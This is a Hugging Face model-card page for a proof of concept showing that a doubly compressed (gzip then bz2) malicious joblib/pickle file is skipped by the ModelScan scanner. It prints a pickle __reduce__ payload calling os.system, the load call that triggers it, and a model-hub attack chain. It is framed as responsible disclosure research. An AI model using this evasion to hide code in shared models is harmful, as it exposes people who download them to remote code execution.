Hugging Face's logo

sandeep1337
/
modelscan-bypass-double-compression

Model card Files
xet
Community
modelscan-bypass-double-compression
File size: 2,637 Bytes
fd0c9f6
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
 
# ModelScan Bypass - Double Compression

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan,
a popular ML model security scanner. This technique allows malicious pickle-based model files
to evade detection.

## Technique

**Nested/double compression**

Payload compressed twice (gzip then bz2)

## ModelScan Result

**SKIPPED - Scanner did not analyze this file**

## File

- `exploit_double_compression.joblib.gz.bz2`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_double_compression.joblib.gz.bz2
```

### Expected Result

SKIPPED - Scanner did not analyze this file

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_double_compression.joblib.gz.bz2')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:**

Payload compressed twice (gzip then bz2)

## Security Impact

**Severity**: HIGH

**Attack Vector**:
1. Attacker creates malicious model using this technique
2. Uploads to model hub (HuggingFace, etc.)
3. Victim downloads and scans with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024
**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only.
Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program